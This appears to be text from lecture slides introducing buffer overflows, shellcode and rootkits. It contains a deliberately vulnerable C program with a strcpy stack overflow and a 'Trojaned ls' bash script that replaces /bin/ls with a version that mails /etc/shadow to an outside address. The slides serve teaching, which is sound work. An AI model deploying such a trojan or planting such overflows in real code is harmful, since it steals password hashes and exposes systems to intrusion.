/* Deliberately vulnerable: the unbounded strcpy() overflows the 10-byte stack
   buffer when argv[1] is longer, which is what the run on the next slide triggers. */
int main(int argc, char *argv[]) {
    char buffer[10];
    if (argc < 2) return 1;          /* avoid a NULL dereference when run without an argument */
    strcpy(buffer, argv[1]);         /* no length check: stack buffer overflow */
    printf("%s", buffer);            /* print through a format string instead of printf(buffer) */
    return 0;
}
Buffer Overflow
user@honeypot:~$ gcc exploit.c -o exploit
user@honeypot:~$ ./exploit thisisanexploit
*** stack smashing detected ***: ./exploit terminated
thisisanexploitAborted
One of gcc's defense mechanisms
Shellcode
A set of instructions (in machine code or not) developed so that they can be injected into an application at run time.
Illegal access to unauthorized memory space
Injection of the shellcode
Rootkits
Set of malicious programs (trojans, backdoors
chkrootkit and rkhunter (Linux)[1];
RootkitRevealer (Windows).
[1] Both available from Ubuntu's package manager.
Trojaned ls
#!/bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail [email protected]" > /bin/ls
/bin/echo "/bin/ls.old" >> /bin/ls
chmod +x /bin/ls
Conclusion